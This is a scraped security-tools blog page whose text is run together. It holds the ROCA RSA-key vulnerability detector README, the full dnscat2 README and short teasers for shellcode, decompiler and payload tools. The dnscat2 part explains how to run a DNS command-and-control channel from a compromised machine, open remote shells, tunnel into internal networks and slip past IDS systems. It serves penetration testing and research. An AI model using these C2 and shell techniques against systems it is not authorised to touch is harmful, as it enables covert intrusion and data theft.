ROC – Infineon RSA Vulnerability

This tool is related to ACM CCS 2017 conference paper #124 Return of the Coppersmith’s Attack: Practical Factorization of Widely Used RSA Moduli.It enables you to test public RSA keys for a presence of the described vulnerability.Update: The paper of the attack is already online, ACM version.Currently the tool supports the following key formats:X509 Certificate, DER encoded, one per file, *.der, *.crtX509 Certificate, PEM encoded, more per file, *.pemRSA PEM encoded private key, public key, more per file, *.pem (has to have correct header —–BEGIN RSA…)SSH public key, *.pub, starting with “ssh-rsa", one per lineASC encoded PGP key, *.pgp, *.asc. More per file, has to have correct header —–BEGIN PGP…APK android application, *.apkone modulus per line text file *.txt, modulus can be a) base64 encoded number, b) hex coded number, c) decimal coded numberJSON file with moduli, one record per line, record with modulus has key "mod" (int, base64, hex, dec encoding supported) certificate(s) with key "cert" / array of certificates with key "certs" are supported, base64 encoded DER.LDIFF file – LDAP database dump. Any field ending with ";binary::" is attempted to decode as X509 certificateJava Key Store file (JKS). Tries empty password & some common, specify more with –jks-pass-filePKCS7 signature with user certificateThe detection tool is intentionally one-file implementation for easy integration / manipulation.Pip installInstall with pip (installs all dependencies)pip install roca-detectLocal installExecute in the root folder of the package:pip install –upgrade –find-links=. .DependenciesIt may be required to install additional dependencies so pip can install e.g. cryptography package.CentOS / RHEL:sudo yum install python-devel python-pip gcc gcc-c++ make automake autoreconf libtool openssl-devel libffi-devel dialogUbuntu:sudo apt-get install python-pip python-dev build-essential libssl-dev libffi-dev swigUsageTo print the basic usage:# If installed with pip / manuallyroca-detect –help# Without installation (can miss dependencies)python roca/detect.pyThe testing tool accepts multiple file names / directories as the input argument. It returns the report showing how many files has been fingerprinted (and which are those).Example (no vulnerabilities found):Running recursively on all my SSH keys and known_hosts:$> roca-detect ~/.ssh2017-10-16 13:39:21 [51272] INFO ### SUMMARY ####################2017-10-16 13:39:21 [51272] INFO Records tested: 922017-10-16 13:39:21 [51272] INFO .. PEM certs: . . . 02017-10-16 13:39:21 [51272] INFO .. DER certs: . . . 02017-10-16 13:39:21 [51272] INFO .. RSA key files: . 162017-10-16 13:39:21 [51272] INFO .. PGP master keys: 02017-10-16 13:39:21 [51272] INFO .. PGP total keys: 02017-10-16 13:39:21 [51272] INFO .. SSH keys: . . . 762017-10-16 13:39:21 [51272] INFO .. APK keys: . . . 02017-10-16 13:39:21 [51272] INFO .. JSON keys: . . . 02017-10-16 13:39:21 [51272] INFO .. LDIFF certs: . . 02017-10-16 13:39:21 [51272] INFO .. JKS certs: . . . 02017-10-16 13:39:21 [51272] INFO .. PKCS7: . . . . . 02017-10-16 13:39:21 [51272] INFO No fingerprinted keys found (OK)2017-10-16 13:39:21 [51272] INFO ################################Example (vulnerabilities found):Running recursively on all my SSH keys and known_hosts:$> roca-detect ~/.ssh2017-10-16 13:39:21 [51272] WARNING Fingerprint found in the Certificate…2017-10-16 13:39:21 [51272] INFO ### SUMMARY ####################2017-10-16 13:39:21 [51272] INFO Records tested: 922017-10-16 13:39:21 [51272] INFO .. PEM certs: . . . 02017-10-16 13:39:21 [51272] INFO .. DER certs: . . . 02017-10-16 13:39:21 [51272] INFO .. RSA key files: . 162017-10-16 13:39:21 [51272] INFO .. PGP master keys: 02017-10-16 13:39:21 [51272] INFO .. PGP total keys: 02017-10-16 13:39:21 [51272] INFO .. SSH keys: . . . 762017-10-16 13:39:21 [51272] INFO .. APK keys: . . . 02017-10-16 13:39:21 [51272] INFO .. JSON keys: . . . 02017-10-16 13:39:21 [51272] INFO .. LDIFF certs: . . 02017-10-16 13:39:21 [51272] INFO .. JKS certs: . . . 02017-10-16 13:39:21 [51272] INFO .. PKCS7: . . . . . 02017-10-16 13:39:21 [51272] INFO Fingerprinted keys found: 12017-10-16 13:39:21 [51272] INFO WARNING: Potential vulnerability2017-10-16 13:39:21 [51272] INFO ################################PGP keyIn order to test your PGP key you can export it from your email client or download it from the PGP key server such as can also use gpg command line utility to export your public key:gpg –armor –export [email protected] > mykey.ascAdvanced use caseDetection tool extracts information about the key which can be –dump –flatten –indent ~/.ssh/Advanced installation methodsVirtual environmentIt is usually recommended to create a new python virtual environment for the project:virtualenv ~/pyenvsource ~/pyenv/bin/activatepip install –upgrade pippip install –upgrade –find-links=. .Separate Python 2.7.13We tested tool with Python 2.7.13 and it works (see Travis for more info). We have reports saying lower versions (<=2.6) do not work properly so we highly recommend using up to date Python 2.7Use pyenv to install a new Python version locally if you cannot / don't want to update system Python.It internally downloads Python sources and installs it to ~/.pyenv.git clone ~/.pyenvecho 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrcecho ‘export PATH="$PYENV_ROOT/bin:$PATH"’ >> ~/.bashrcecho ‘eval "$(pyenv init -)"’ >> ~/.bashrcexec $SHELLpyenv install 2.7.13pyenv local 2.7.13Python 3Basic testing routine is quite simple and works with Py3 but the rest of the code that processes the different key formats and extracts the modulus for inspection is not yet fully py3 ready.We are working on Py3 compatible version.Docker containerRun via Docker container to avoid environment inconsistency. Dockerfile source can be audited at run –rm -v /path/to/your/keys:/keys –network none unnawut/roca-detectMake sure to use –rm and –network none flags to disable container’s network connection and delete the container after running.Download ROCA


ROCA – Infineon RSA key vulnerability.

The ROCA vulnerability has been discovered by researchers at Masaryk University (Brno, Czech Republic). As two of the researchers are also affiliated with Enigma Bridge…


dnscat2 – Create an Encrypted Command & Control (C&C) Channel over the DNS Protocol

dnscat2 is a DNS tunnel that WON’T make you sick and kill you!This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network.This README file should contain everything you need to get up and running! If you’re interested in digging deeper into the protocol, how the code is structured, future plans, or other esoteric stuff, check out the doc/ folder.Overviewdnscat2 comes in two parts: the client and the server.The client is designed to be run on a compromised machine. It’s written in C and has the minimum possible dependencies. It should run just about anywhere (if you find a system where it doesn’t compile or run, please file a ticket, particularly if you can help me get access to said system).When you run the client, you typically specify a domain name. All requests will be sent to the local DNS server, which are then redirected to the authoritative DNS server for that domain (which you, presumably, have control of).If you don’t have an authoritative DNS server, you can also use direct connections on UDP/53 (or whatever you choose). They’ll be faster, and still look like DNS traffic to the casual viewer, but it’s much more obvious in a packet log (all domains are prefixed with “dnscat.", unless you hack the source). This mode will frequently be blocked by firewalls.The server is designed to be run on an authoritative DNS server. It’s in ruby, and depends on several different gems. When you run it, much like the client, you specify which domain(s) it should listen for in addition to listening for messages sent directly to it on UDP/53. When it receives traffic for one of those domains, it attempts to establish a logical connection. If it receives other traffic, it ignores it by default, but can also forward it upstream.Detailed instructions for both parts are below.How is this different from …..dnscat2 strives to be different from other DNS tunneling protocols by being designed for a special purpose: command and control.This isn’t designed to get you off a hotel network, or to get free Internet on a plane. And it doesn’t just tunnel TCP.It can tunnel any data, with no protocol attached. Which means it can upload and download files, it can run a shell, and it can do those things well. It can also potentially tunnel TCP, but that’s only going to be added in the context of a pen-testing tool (that is, tunneling TCP into a network), not as a general purpose tunneling tool. That’s been done, it’s not interesting (to me).It’s also encrypted by default. I don’t believe any other public DNS tunnel encrypts all traffic!How to playThe theory behind dnscat2 is simple: it creates a tunnel over the DNS protocol.Why? Because DNS has an amazing property: it’ll make its way from server to server until it figures out where it’s supposed to go.That means that for dnscat to get traffic off a secure network, it simply has to send messages to a DNS server, which will happily forward things through the DNS network until it gets to your DNS server.That, of course, assumes you have access to an authoritative DNS server. dnscat2 also supports "direct" connections – that is, running a dnscat client that directly connects to your dnscat on your ip address and UDP port 53 (by default). The traffic still looks like DNS traffic, and might get past dumber IDS/IPS systems, but is still likely to be stopped by firewalls.If you aren’t clear on how to set up an authoritative DNS server, it’s something you have to set up with a domain provider. izhan helpfully wrote one for you!CompilingClientCompiling the client should be pretty straight forward – all you should need to compile is make/gcc (for Linux) or either Cygwin or Microsoft Visual Studio (for Windows). Here are the commands on Linux:$ git clone$ cd dnscat2/client/$ makeOn Windows, load client/win32/dnscat2.vcproj into Visual Studio and hit "build". I created and test it on Visual Studio 2008 – until I get a free legit copy of a newer version, I’ll likely be sticking with that one. :)If compilation fails, please file a bug on my github page! Please send details about your system.You can verify dnscat2 is successfully compiled by running it with no flags; you’ll see it attempting to start a DNS tunnel with whatever your configured DNS server is (which will fail):$ ./dnscatStarting DNS driver without a domain! This will only work if youare directly connecting to the dnscat2 server.You’ll need to use –dns server= if you aren’t.** WARNING!** It looks like you’re running dnscat2 with the system DNS server,* and no domain name!** That’s cool, I’m not going to stop you, but the odds are really,* really high that this won’t work. You either need to provide a* domain to use DNS resolution (requires an authoritative server):** dnscat** Or you have to provide a server to connect directly to:** dnscat –dns=server=,port=53** I’m going to let this keep running, but once again, this likely* isn’t what you want!*** WARNING!Creating DNS driver: domain = (null) host = port = 53 type = TXT,CNAME,MX server =[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: DNS: RCODE_NAME_ERROR[[ ERROR ]] :: The server hasn’t returned a valid response in the last 10 attempts.. closing session.[[ FATAL ]] :: There are no active sessions left! Goodbye![[ WARNING ]] :: TerminatingServerThe server isn’t "compiled", as such, but it does require some Ruby dependencies. Unfortunately, Ruby dependencies can be annoying to get working, so good luck! If any Ruby experts out there want to help make this section better, I’d be grateful!I’m assuming you have Ruby and Gem installed and in working order. If they aren’t, install them with either apt-get, emerge, rvm, or however is normal on your operating system.Once Ruby/Gem are sorted out, run these commands (note: you can obviously skip the git clone command if you already installed the client and skip gem install bundler if you’ve already installed bundler):$ git clone$ cd dnscat2/server/$ gem install bundler$ bundle installIf you get a permissions error with gem install bundler or bundler install, you may need to run them as root. If you have a lot of problems, uninstall Ruby/Gem and install everything using rvm and without root.If you get an error that looks like this:/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require’: cannot load such file — mkmf (LoadError)It means you need to install the -dev version of Ruby:$ sudo apt-get install ruby-devI find that sudo isn’t always enough to get everything working right, I sometimes have to switch to root and work directly as that account. rvmsudo doesn’t help, because it breaks ctrl-z.You can verify the server is working by running it with no flags and seeing if you get a dnscat2> prompt:# ruby ./dnscat2.rbNew window created: 0Welcome to dnscat2! Some documentation may be out of date.passthrough => disabledauto_attach => falseauto_command =>process =>history_size (for new windows) => 1000New window created: dns1Starting Dnscat2 DNS server on[domains = n/a]…It looks like you didn’t give me any domains to recognize!That’s cool, though, you can still use direct queries,although those are less stealthy.To talk directly to the server without a domain name, run: ./dnscat2 –dns server=x.x.x.x,port=53Of course, you have to figure out <server> yourself! Clientswill connect directly on UDP port 53.dnscat2>If you don’t run it as root, you might have trouble listening on UDP/53 (you can use –dnsport to change it). You’ll see an error message if that’s the case.Ruby as rootIf you’re having trouble running Ruby as root, this is what I do to run it the first time:$ cd dnscat2/server$ su# gpg –keyserver hkp:// –recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3# \curl -sSL | bash# source /etc/profile.d/ rvm install 1.9# rvm use 1.9# bundle install# ruby ./dnscat2.rbAnd subsequent times:$ cd dnscat2/server$ su# source /etc/profile.d/ ruby ./dnscat2.rbrvmsudo should make it easier, but dnscat2 doesn’t play well with rvmsudo unfortunately.UsageClient + serverBefore we talk about how to specifically use the tools, let’s talk about how dnscat is structured. The dnscat tool is divided into two pieces: a client and a server. As you noticed if you went through the compilation, the client is written in C and the server is in Ruby.Generally, the server is run first. It can be long lived, and handle as many clients as you’d like. As I said before, it’s basically a C&C service.Later, a client is run, which opens a session with the server (more on sessions below). The session can either traverse the DNS hierarchy (recommended, but more complex) or connect directly to the server. Traversing the DNS hierarchy requires an authoritative domain, but will bypass most firewalls. Connecting directly to the server is more obvious for several reasons.By default, connections are automatically encrypted (turn it off on the client with –no-encryption and on the server with –security=open). When establishing a new connection, if you’re paranoid about man-in-the-middle attacks, you have two options for verifying the peer:Pass a pre-shared secret using the –secret argument on both sides to validate the connectionManually verify the "short authentication string" – a series of words that are printed on both the client and server after encryption is negotiatedRunning a serverThe server – which is typically run on the authoritative DNS server for a particular domain – is designed to be feature-ful, interactive, and user friendly. It’s written in Ruby, and much of its design is inspired by Metasploit and Meterpreter.If you followed the compilation instructions above, you should be able to just run the server:$ ruby ./dnscat2.rb skullseclabs.orgWhere "" is your own domain. If you don’t have an authoritative DNS server, it isn’t mandatory; but this tool works way, way better with an authoritative server.That should actually be all you need! Other than that, you can test it using the client’s –ping command on any other system, which should be available if you’ve compiled it:$ ./dnscat –ping skullseclabs.orgIf the ping succeeds, your C&C server is probably good! If you ran the DNS server on a different port, or if you need to use a custom DNS resolver, you can use the –dns flag in addition to –ping:$ ./dnscat –dns server=, –ping$ ./dnscat –dns port=53531,server=localhost, –pingNote that when you specify a –dns argument, the domain has to be part of that argument (as domain=xxx). You can’t just pass it on the commandline (due to a limitation of my command parsing; I’ll likely improve that in a future release).When the process is running, you can start a new server using basically the exact same syntax:dnscat2> start –dns=port=53532,,domain=test.comNew window created: dns2Starting Dnscat2 DNS server on[domains =,]…Assuming you have an authoritative DNS server, you can runthe client anywhere with the following: ./dnscat2 ./dnscat2 test.comTo talk directly to the server without a domain name, run: ./dnscat2 –dns server=x.x.x.x,port=53532Of course, you have to figure out <server> yourself! Clientswill connect directly on UDP port 53532.You can run as many DNS listeners as you want, as long as they’re on different hosts/ports. Once the data comes in, the rest of the process doesn’t even know which listener data came from; in fact, a client can send different packets to different ports, and the session will continue as expected.Running a clientThe client – which is typically run on a system after compromising it – is designed to be simple, stable, and portable. It’s written in C and has as few library dependencies as possible, and compiles/runs natively on Linux, Windows, Cygwin, FreeBSD, and Mac OS X.The client is given the domain name on the commandline, for example:./dnscat2 skullseclabs.orgIn that example, it will create a C&C session with the dnscat2 server running on If an authoritative domain isn’t an option, it can be given a specific ip address to connect to instead:./dnscat2 –dns host=,port=5353Assuming there’s a dnscat2 server running on that host/port, it’ll create a session there.TunnelsYo dawg; I hear you like tunnels, so now you can tunnel a tunnel through your tunnel!It is currently possible to tunnel a connection through dnscat2, similar to "ssh -L"! Other modes ("ssh -D" and "ssh -R") are coming soon as well!After a session has started (a command session), the command "listen" is used to open a new tunnelled port. The syntax is roughly the same as ssh -L:listen [lhost:]lport rhost:rportThe local host is option, and will default to all interfaces ( The local port and remote host/port are mandatory.The dnscat2 server will listen on lport. All connections received to that port are forwarded, via the dnscat2 client, to the remote host/port chosen.For example, this will listen on port 4444 (on the server) and forward traffic to google:listen 4444, if you connect to http://localhost:4444, it’ll come out the dnscat2 client and connect to’s say you’re using this on a pentest and you want to forward ssh connections through the dnscat2 client (running on somebody’s corp network) to an internal device. You can!listen’ll only listen on the localhost interface on the dnscat2 server, and will forward connections via the tunnel to port 22 of is encrypted by default.I’m not a cryptographer, and by necessity I came up with the encryption scheme myself. As a result, I wouldn’t trust this 100%. I think I did a pretty good job preventing attacks, but this hasn’t been professionally audited. Use with caution.There is a ton of technical information about the encryption in the protocol doc. But here are the basics.By default, both the client and the server support and will attempt encryption. Each connection uses a new keypair, negotiated by ECDH. All encryption is done by salsa20, and signatures use sha3.Encryption can be disabled on the client by passing –no-encryption on the commandline, or by compiling it using make nocrypto.The server will reject unencrypted connections by default. To allow unencrypted connections, pass –security=open to the server, or run set security=open on the console.By default, there’s no protection against man-in-the-middle attacks. As mentioned before, there are two different ways to gain MitM protection: a pre-shared secret or a "short authentication string".A pre-shared secret is passed on the commandline to both the client and the server, and is used to authenticate both the client to the server and the server to the client. It should be a somewhat strong value – something that can’t be quickly guessed by an attacker (there’s only a short window for the attacker to guess it, so it only has to hold up for a few seconds).The pre-shared secret is passed in via the –secret parameter on both the client and the server. The server can change it at runtime using set secret=<new value>, but that can have unexpected results if active clients are connected.Furthermore, the server can enforce only authenticated connections are allowed by using –security=authenticated or set security=authenticated. That’s enabled by default if you pass the –secret parameter.If you don’t require the extra effort of authenticating connections, then a "short authentication string" is displayed by both the client and the server. The short authentication string is a series of English words that are derived based on the secret values that both sides share.If the same set of English words are printed on both the client and the server, the connection can be reasonably considered to be secure.That’s about all you need to know about the encryption! See the protocol doc for details! I’d love to hear any feedback on the crypto, as well. :)And finally, if you have any problems with the crypto, please let me know! By default a window called "crypto-debug" will be created at the start. If you have encryption problems, please send me that log! Or, better yet, run dnscat2 with the –firehose and –packet-trace arguments, and send me EVERYTHING! Don’t worry about revealing private keys; they’re only used for that one session.dnscat2’s WindowsThe dnscat2 UI is made up of a bunch of windows. The default window is called the ‘main’ window. You can get a list of windows by typing windows (or sessions) into any command prompt:dnscat2> windows0 :: main [active] dns1 :: DNS Driver running on domains = [*]You’ll note that there are two windows – window 0 is the main window, and window dns1 is the listener (technically referred to as the ‘tunnel driver’).From any window that accepts commands (main and command sessions), you can type help to get a list of commands:dnscat2> helpHere is a list of commands (use -h on any of them for additional help):* echo* help* kill* quit* set* start* stop* tunnels* unset* window* windowsFor any of those commands, you can use -h or –help to get details:dnscat2> window –helpError: The user requested helpInteract with a window -i, –i=<s> Interact with the chosen window -h, –help Show this messageWe’ll use the window command to interact with dns1, which is a status window:dnscat2> window -i dns1New window created: dns1Starting Dnscat2 DNS server on[domains =]…Assuming you have an authoritative DNS server, you can runthe client anywhere with the following: ./dnscat2 skullseclabs.orgTo talk directly to the server without a domain name, run: ./dnscat2 –dns server=x.x.x.x,port=53531Of course, you have to figure out <server> yourself! Clientswill connect directly on UDP port 53531.Received: dnscat.9fa0ff178f72686d6c716c6376697968657a6d716800 (TXT)Sending: 9fa0ff178f72686d6c716c6376697968657a6d716800Received: (MX)Sending: d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.orgThe received and sent strings there are, if you decode them, pings.You can switch to the ‘parent’ window (in this case, main) by pressing ctrl-z. If ctrl-z kills the process, then you probably have to find a better way to run it (rvmsudo doesn’t work, see above).When a new client connects and creates a session, you’ll be notified in main (and certain other windows):New window created: 1dnscat2>(Note that you have to press enter to get the prompt back)You can switch to the new window the same way we switched to the dns1 status window:dnscat2> window -i 1New window created: 1history_size (session) => 1000This is a command session!That means you can enter a dnscat2 command such as’ping’! For a full list of clients, try ‘help’.command session (ubuntu-64) 1>Command sessions can spawn additional sessions; for example, the shell command:command session (ubuntu-64) 1> shellSent request to execute a shellNew window created: 2Shell session created!command session (ubuntu-64) 1>(Note that throughout this document I’m cleaning up the output; usually you have to press enter to get the prompt back)Then, if you return to the main session (ctrl-z or suspend, you’ll see it in the list of windows:dnscat2> windows0 :: main [active] dns1 :: DNS Driver running on domains = [*] 1 :: command session (ubuntu-64) 2 :: sh (ubuntu-64) [*]Unfortunately, the ‘windows’ command in a specific command session only shows child windows from that session, and right now new sessions aren’t spawned as children.Note that some sessions have [*] – that means that there’s been activity since the last time we looked at them.When you interact with a session, the interface will look different depending on the session type. As you saw with the default session type (command sessions) you get a UI just like the top-level session (you can type ‘help’ or run commands or whatever). However, if you interact with a ‘shell’ session, you won’t see much immediately, until you type a command:dnscat2> windows0 :: main [active] dns1 :: DNS Driver running on domains = [*] 1 :: command session (ubuntu-64) 2 :: sh (ubuntu-64) [*]dnscat2> session -i 2New window created: 2history_size (session) => 1000This is a console session!That means that anything you type will be sent as-is to theclient, and anything they type will be displayed as-is on thescreen! If the client is executing a command and you don’tsee a prompt, try typing ‘pwd’ or something!To go back, type (ubuntu-64) 2> pwd/home/ron/tools/dnscat2/clientTo escape this, you can use ctrl-z or type "exit" (which will kill the session).Lastly, to kill a session, the kill command can be used:dnscat2> windows0 :: main [active] dns1 :: DNS Driver running on domains = [*] 1 :: command session (ubuntu-64) 2 :: sh (ubuntu-64) [*]dnscat2> kill 2Session 2 has been sent the kill signal!Session 2 has been killeddnscat2> windows0 :: main [active] dns1 :: DNS Driver running on domains = [*] 1 :: command session (ubuntu-64)Download dnscat2</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-51006" class="post-51006 post type-post status-publish format-standard hentry category-uncategorized tag-code-scripting tag-decode tag-memory-analysis tag-msfvenom tag-penetration-test tag-shellcode"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/08/28/shellcarver-carve-shellcode-within-the-memory-using-restrictive-character-set/" rel="bookmark">shellcarver – Carve shellcode within the memory using restrictive character set.</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>shellcarver is a Carve shellcode within the memory using restrictive character set. Purpose: To calculate possible sub eax statements to help assist in carving code…</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-50138" class="post-50138 post type-post status-publish format-standard hentry category-uncategorized tag-android tag-bytecode-viewer tag-bytecodeviewer tag-converter tag-debugger tag-debugging tag-decode tag-dex tag-dex2jar tag-extension tag-java tag-processes tag-python tag-reverse-engineering tag-sandbox tag-scanner tag-windows tag-wrapper"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/08/21/bytecode-viewer-a-java-8-jar-android-apk-reverse-engineering-suite-decompiler-editor-debugger-more/" rel="bookmark">Bytecode Viewer – A Java 8 Jar & Android Apk Reverse Engineering Suite (Decompiler, Editor, Debugger & More)</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more.It’s written completely in Java, and it’s open sourced. It’s currently being maintained and developed by Konloch.There is also a plugin system that will allow you to interact with the loaded classfiles, for example you can write a String deobfuscator, a malicious code searcher, or something else you can think of.You can either use one of the pre-written plugins, or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM.Code from various projects has been used, including but not limited to:    J-RET by WaterWolf    JHexPane by Sam Koivu    RSynaxPane by Robert Futrell    Commons IO by Apache    ASM by OW2    FernFlower by Stiver    Procyon by Mstrobel    CFR by Lee Benfield    CFIDE by Bibl    Smali by JesusFreke    Dex2Jar by pxb1..?    Krakatau by Storyyeller    JD GUI/JD Core by The Java-Decompiler Team    Enjarify by StoryyellerFeatures:Easy to use yet extremely effective.Written to run on Java 7, supports Java 8.Compile Decompiled Java classes with Ranino Compiler.Quickly decompile classes using JD-Core.Easily edit APKs via Smali/Baksmali integration.Java Decompiling with five different decompilers (DJ-GUI/Core, Procyon, CFR, Fernflower and Krakatau).Bytecode Decompiling with CFIDE.Android APK integrated with Dex2Jar.Securely launch Java applications and insert hooks via EZ-Injection.Scan for malicious code with the Malicious Code Scanner plugin.Export as DEX, Jar, Class, Zip or Java Source File.Open Android APKs, Android DEX, Java Class Files and Java Jars.Extensively configurable, over 100+ settings!Works seamlessly with all Operating Systems.Integrate BCV into Windows by installing it, it’ll associate all .class, .dex and .apk to open with BCV.View Jar & APK Resources with ease by APKTool.jar integration.100% free and open sourced under GPL v3 CopyLeft.Video:Download Bytecode Viewer</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-49940" class="post-49940 post type-post status-publish format-standard hentry category-uncategorized tag-communications tag-decode tag-firewall tag-ftp tag-penetration-test tag-sniffer tag-spoofing"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/08/20/penthefire-security-tool-implementing-attacks-test-the-resistance-of-firewall/" rel="bookmark">penthefire – Security tool implementing attacks test the resistance of firewall.</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>LEGAL DISCLAMER The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal…</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-48988" class="post-48988 post type-post status-publish format-standard hentry category-uncategorized tag-android tag-android-tools tag-anti-malware tag-apk-tools tag-code-scripting tag-decode tag-malware-analysis tag-security-tools"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/08/16/apkstat-automated-information-retrieval-from-apks-for-initial-analysis/" rel="bookmark">APKStat – Automated Information Retrieval From APKs For Initial Analysis.</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>APKStat – Automated Information Retrieval From APKs For Initial Analysis. APKStat will use APK Tool to decompress and decode your APK file. APK Stat Will:…</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-48546" class="post-48546 post type-post status-publish format-standard hentry category-uncategorized tag-android tag-decode tag-dex tag-jadx tag-java tag-java-decompiler tag-linux tag-mac tag-windows"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/08/12/jadx-dex-to-java-decompiler/" rel="bookmark">jadx – Dex to Java Decompiler</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>jadx – Dex to Java decompilerCommand line and GUI tools for produce Java source code from Android Dex and Apk files.Building from sourcegit clone jadx./gradlew dist(on Windows, use gradlew.bat instead of ./gradlew)Scripts for run jadx will be placed in build/jadx/bin and also packed to build/jadx-<version>.zipRunRun jadx on itself:cd build/jadx/bin/jadx -d out lib/jadx-core-*.jar#orbin/jadx-gui lib/jadx-core-*.jarUsagejadx[-gui] [options] <input file> (.dex, .apk, .jar or .class)options: -d, –output-dir – output directory -j, –threads-count – processing threads count -r, –no-res – do not decode resources -s, –no-src – do not decompile source code -e, –export-gradle – save as android gradle project –show-bad-code – show inconsistent code (incorrectly decompiled) –no-replace-consts – don’t replace constant value with matching constant field –escape-unicode – escape non latin characters in strings (with \u) –deobf – activate deobfuscation –deobf-min – min length of name –deobf-max – max length of name –deobf-rewrite-cfg – force to save deobfuscation map –deobf-use-sourcename – use source file name as class name alias –cfg – save methods control flow graph to dot file –raw-cfg – save methods control flow graph (use raw instructions) -f, –fallback – make simple dump (using goto instead of ‘if’, ‘for’, etc) -v, –verbose – verbose output -h, –help – print this helpExample: jadx -d out classes.dexTroubleshootingOut of memory error:Reduce processing threads count (-j option)Increase maximum java heap size: command line (example for linux): JAVA_OPTS=”-Xmx4G" jadx -j 1 some.apkedit ‘jadx’ script (jadx.bat on Windows) and setup bigger heap size: DEFAULT_JVM_OPTS="-Xmx2500M"ContributionTo support this project you can:Post thoughts about new features/optimizations that important to youSubmit bug using one of following patterns: Java code examples which decompiles incorrectlyError log and link to public available apk file or app page on Google playDownload jadx</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-40248" class="post-40248 post type-post status-publish format-standard hentry category-uncategorized tag-decode tag-encode tag-framework tag-node-js tag-payload tag-penetration-test tag-privilege-escalation tag-reverseshell tag-shellcode tag-testing-proxys"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="/category/uncategorized/" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="/2017/06/30/brosec-v1-3-0-3-an-interactive-reference-tool-to-help-security-professionals-utilize-useful-payload-commands/" rel="bookmark">Brosec v1.3.0.3 – An interactive reference tool to help security professionals utilize useful payload & commands.</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>changelog brosec v1.3.0.3 (June 30, 2017): * Minor Fix & Enhancement + Added new payloads to wmic (bros 34) + Added netsh proxy command to…</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <div class="navigation posts-navigation"><ul> <li class="active"><a href="/tag/decode/">1</a></li> <li><a href="/tag/decode/page/2/">2</a></li> <li><a href="/tag/decode/page/2/" >></a></li> </ul></div> </main><!-- #main --> </div><!-- #primary --> <div id="secondary" class="widget-area" role="complementary"> <aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action=""> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search …" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside> <aside id="recent-posts-2" class="widget widget_recent_entries"> <h4 class="widget-title">Recent Posts</h4> <ul> <li> <a href="/2017/12/04/digital-whisper-electronic-magazine-89/">Digital Whisper Electronic Magazine #89</a> </li> <li> <a href="/2017/12/04/jobs2careers-coroflot-clone-sql-injection-2/">Jobs2Careers / Coroflot Clone SQL Injection</a> </li> <li> <a href="/2017/12/04/fortigate-ssl-vpn-portal-5-x-cross-site-scripting/">FortiGate SSL VPN Portal 5.x Cross Site Scripting</a> </li> <li> <a 